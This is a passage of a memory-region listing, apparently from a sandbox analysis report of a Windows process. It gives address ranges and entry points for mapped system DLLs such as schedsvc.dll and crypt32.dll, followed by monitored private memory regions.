entry_point = 0x7fefa21afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2191 start_va = 0x7fefa330000 end_va = 0x7fefa339fff monitored = 0 entry_point = 0x7fefa33260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 2192 start_va = 0x7fefa340000 end_va = 0x7fefa451fff monitored = 0 entry_point = 0x7fefa35f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2193 start_va = 0x7fefa460000 end_va = 0x7fefa46efff monitored = 0 entry_point = 0x7fefa467e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 2194 start_va = 0x7fefa470000 end_va = 0x7fefa478fff monitored = 0 entry_point = 0x7fefa473668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2195 start_va = 0x7fefa480000 end_va = 0x7fefa488fff monitored = 0 entry_point = 0x7fefa481020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 2196 start_va = 0x7fefa490000 end_va = 0x7fefa4e5fff monitored = 0 entry_point = 0x7fefa491040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2197 start_va = 0x7fefa4f0000 end_va = 0x7fefa507fff monitored = 0 entry_point = 0x7fefa4f1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2198 start_va = 0x7fefa510000 end_va = 0x7fefa56dfff monitored = 0 entry_point = 0x7fefa519024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2199 start_va = 0x7fefa590000 end_va = 0x7fefa5a0fff monitored = 0 entry_point = 0x7fefa5916ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2200 start_va = 0x7fefa5c0000 end_va = 0x7fefa612fff monitored = 0 entry_point = 0x7fefa5c2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2201 start_va = 0x7fefa7d0000 end_va = 0x7fefa7e3fff monitored = 0 entry_point = 0x7fefa7d3e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2202 start_va = 0x7fefa7f0000 end_va = 0x7fefa7fafff monitored = 0 entry_point = 0x7fefa7f1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2203 start_va = 0x7fefa800000 end_va = 0x7fefa826fff monitored = 0 entry_point = 0x7fefa8098bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2204 start_va = 0x7fefa830000 end_va = 0x7fefa896fff monitored = 0 entry_point = 0x7fefa846060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2205 start_va = 0x7fefa8b0000 end_va = 0x7fefa8bafff monitored = 0 entry_point = 0x7fefa8b4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2206 start_va = 0x7fefa8c0000 end_va = 0x7fefa8cbfff monitored = 0 entry_point = 0x7fefa8c15d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2207 start_va = 0x7fefaa40000 end_va = 0x7fefaa4ffff monitored = 0 entry_point = 0x7fefaa4835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2208 start_va = 0x7fefaa50000 end_va = 0x7fefaa68fff monitored = 0 entry_point = 0x7fefaa511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2209 start_va = 0x7fefaa70000 end_va = 0x7fefaaa6fff monitored = 0 entry_point = 0x7fefaa78424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2210 start_va = 0x7fefaae0000 end_va = 0x7fefaaf4fff monitored = 0 entry_point = 0x7fefaae60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2211 start_va = 0x7fefab00000 end_va = 0x7fefabc1fff monitored = 0 entry_point = 0x7fefab0101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2212 start_va = 0x7fefac80000 end_va = 0x7fefac9cfff monitored = 0 entry_point = 0x7fefac82f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 2213 start_va = 0x7fefaca0000 end_va = 0x7fefaca8fff monitored = 0 entry_point = 0x7fefaca1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2214 start_va = 0x7fefad90000 end_va = 0x7fefadbcfff monitored = 0 entry_point = 0x7fefad91010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2215 start_va = 0x7fefadc0000 end_va = 0x7fefadd0fff monitored = 0 entry_point = 0x7fefadc14c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2216 start_va = 0x7fefaf10000 end_va = 0x7fefaf23fff monitored = 0 entry_point = 0x7fefaf116b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2217 start_va = 0x7fefaf30000 end_va = 0x7fefaf44fff monitored = 0 entry_point = 0x7fefaf31050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2218 start_va = 0x7fefaf50000 end_va = 0x7fefaf5bfff monitored = 0 entry_point = 0x7fefaf518a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2219 start_va = 0x7fefaf60000 end_va = 0x7fefaf75fff monitored = 0 entry_point = 0x7fefaf611a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2220 start_va = 0x7fefb090000 end_va = 0x7fefb0a0fff monitored = 0 entry_point = 0x7fefb091070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2221 start_va = 0x7fefb1f0000 end_va = 0x7fefb224fff monitored = 0 entry_point = 0x7fefb1f1064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2222 start_va = 0x7fefb660000 end_va = 0x7fefb6b5fff monitored = 0 entry_point = 0x7fefb66bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2223 start_va = 0x7fefb6c0000 end_va = 0x7fefb7ebfff monitored = 0 entry_point = 0x7fefb6c94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2224 start_va = 0x7fefb7f0000 end_va = 0x7fefb80cfff monitored = 0 entry_point = 0x7fefb7f1ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2225 start_va = 0x7fefb840000 end_va = 0x7fefba33fff monitored = 0 entry_point = 0x7fefb9cc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 2226 start_va = 0x7fefbed0000 end_va = 0x7fefbedbfff monitored = 0 entry_point = 0x7fefbed1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2227 start_va = 0x7fefbee0000 end_va = 0x7fefbf9afff monitored = 0 entry_point = 0x7fefbee6de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2228 start_va = 0x7fefbfa0000 end_va = 0x7fefbfa6fff monitored = 0 entry_point = 0x7fefbfa14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 2229 start_va = 0x7fefc060000 end_va = 0x7fefc06cfff monitored = 0 entry_point = 0x7fefc061348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 2230 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bafff monitored = 0 entry_point = 0x7fefc0a2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2231 start_va = 0x7fefc0c0000 end_va = 0x7fefc0ddfff monitored = 0 entry_point = 0x7fefc0c13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2232 start_va = 0x7fefc0e0000 end_va = 0x7fefc0f1fff monitored = 0 entry_point = 0x7fefc0e1060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2233 start_va = 0x7fefc190000 end_va = 0x7fefc1c8fff monitored = 0 entry_point = 0x7fefc19c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2234 start_va = 0x7fefc1d0000 end_va = 0x7fefc1d9fff monitored = 0 entry_point = 0x7fefc1d3cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2235 start_va = 0x7fefc300000 end_va = 0x7fefc346fff monitored = 0 entry_point = 0x7fefc301064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2236 start_va = 0x7fefc3f0000 end_va = 0x7fefc41ffff monitored = 0 entry_point = 0x7fefc3f194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2237 start_va = 0x7fefc420000 end_va = 0x7fefc47afff monitored = 0 entry_point = 0x7fefc426940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2238 start_va = 0x7fefc590000 end_va = 0x7fefc596fff monitored = 0 entry_point = 0x7fefc59142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 2239 start_va = 0x7fefc5a0000 end_va = 0x7fefc5f4fff monitored = 0 entry_point = 0x7fefc5a1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2240 start_va = 0x7fefc600000 end_va = 0x7fefc617fff monitored = 0 entry_point = 0x7fefc603b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2241 start_va = 0x7fefc710000 end_va = 0x7fefc741fff monitored = 0 entry_point = 0x7fefc71144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2242 start_va = 0x7fefc760000 end_va = 0x7fefc769fff monitored = 0 entry_point = 0x7fefc763b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2243 start_va = 0x7fefc770000 end_va = 0x7fefc791fff monitored = 0 entry_point = 0x7fefc775d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2244 start_va = 0x7fefc7f0000 end_va = 0x7fefc81efff monitored = 0 entry_point = 0x7fefc7f1064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2245 start_va = 0x7fefc830000 end_va = 0x7fefc89cfff monitored = 0 entry_point = 0x7fefc831010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2246 start_va = 0x7fefc8a0000 end_va = 0x7fefc8b3fff monitored = 0 entry_point = 0x7fefc8a4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 2247 start_va = 0x7fefcb00000 end_va = 0x7fefcb22fff monitored = 0 entry_point = 0x7fefcb01198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2248 start_va = 0x7fefcba0000 end_va = 0x7fefcbaafff monitored = 0 entry_point = 0x7fefcba1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2249 start_va = 0x7fefcbd0000 end_va = 0x7fefcbf4fff monitored = 0 entry_point = 0x7fefcbd9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2250 start_va = 0x7fefcc00000 end_va = 0x7fefcc0efff monitored = 0 entry_point = 0x7fefcc01010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2251 start_va = 0x7fefcc10000 end_va = 0x7fefcca0fff monitored = 0 entry_point = 0x7fefcc11440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2252 start_va = 0x7fefccb0000 end_va = 0x7fefccecfff monitored = 0 entry_point = 0x7fefccb18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2253 start_va = 0x7fefccf0000 end_va = 0x7fefcd03fff monitored = 0 entry_point = 0x7fefccf10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2254 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd119b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2255 start_va = 0x7fefcdb0000 end_va = 0x7fefcdbefff monitored = 0 entry_point = 0x7fefcdb1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2256 start_va = 0x7fefcdc0000 end_va = 0x7fefce2bfff monitored = 0 entry_point = 0x7fefcdc2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2257 start_va = 0x7fefce30000 end_va = 0x7fefce65fff monitored = 0 entry_point = 0x7fefce31474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2258 start_va = 0x7fefcf10000 end_va = 0x7fefd07cfff monitored = 0 entry_point = 0x7fefcf110b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2259 start_va = 0x7fefd080000 end_va = 0x7fefd0bafff monitored = 0 entry_point = 0x7fefd081324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2260 start_va = 0x7fefd0c0000 end_va = 0x7fefd0d9fff monitored = 0 entry_point = 0x7fefd0c1558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2261 start_va = 0x7fefd0e0000 end_va = 0x7fefd1e8fff monitored = 0 entry_point = 0x7fefd0e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2262 start_va = 0x7fefd1f0000 end_va = 0x7fefd260fff monitored = 0 entry_point = 0x7fefd201e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2263 start_va = 0x7fefd310000 end_va = 0x7fefd3d8fff monitored = 0 entry_point = 0x7fefd38a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2264 start_va = 0x7fefd3e0000 end_va = 0x7fefd4bafff monitored = 0 entry_point = 0x7fefd400760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2265 start_va = 0x7fefd640000 end_va = 0x7fefd66dfff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2266 start_va = 0x7fefd670000 end_va = 0x7fefd846fff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2267 start_va = 0x7fefd850000 end_va = 0x7fefe5d7fff monitored = 0 entry_point = 0x7fefd8ccebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2268 start_va = 0x7fefe5e0000 end_va = 0x7fefe678fff monitored = 0 entry_point = 0x7fefe5e1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2269 start_va = 0x7fefe680000 end_va = 0x7fefe6e6fff monitored = 0 entry_point = 0x7fefe68b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2270 start_va = 0x7fefe6f0000 end_va = 0x7fefe8f2fff monitored = 0 entry_point = 0x7fefe713330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2271 start_va = 0x7fefe900000 end_va = 0x7fefe9d6fff monitored = 0 entry_point = 0x7fefe903274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2272 start_va = 0x7fefe9e0000 end_va = 0x7fefea2cfff monitored = 0 entry_point = 0x7fefe9e1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2273 start_va = 0x7fefeb60000 end_va = 0x7fefeb67fff monitored = 0 entry_point = 0x7fefeb61504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2274 start_va = 0x7fefeb70000 end_va = 0x7fefeb7dfff monitored = 0 entry_point = 0x7fefeb71080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2275 start_va = 0x7fefeb80000 end_va = 0x7fefebd1fff monitored = 0 entry_point = 0x7fefeb810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2276 start_va = 0x7fefebe0000 end_va = 0x7fefed0cfff monitored = 0 entry_point = 0x7fefec2ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2277 start_va = 0x7fefed10000 end_va = 0x7fefed2efff monitored = 0 entry_point = 0x7fefed160e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2278 start_va = 0x7fefef90000 end_va = 0x7feff02efff monitored = 0 entry_point = 0x7fefef925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2279 start_va = 0x7feff0e0000 end_va = 0x7feff0e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2280 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 2281 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 2282 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 2283 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 2284 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 2285 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 2286 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 2287 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 2288 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 2289 start_va = 0x7fffff70000 end_va = 0x7fffff71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 2290 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 2291 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 2292 start_va = 0x7fffff76000 end_va = 0x7fffff77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 2293 start_va = 0x7fffff78000 end_va = 0x7fffff79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 2294 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 2295 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 2296 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 2297 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 2298 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 2299 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 2300 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 2301 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 2302 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 2303 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 2304 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 2305 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 2306 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 2307 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 2308 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 2309 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 2310 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 2311 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2312 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2313 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2314 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2315 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2316 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 2317 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 2318 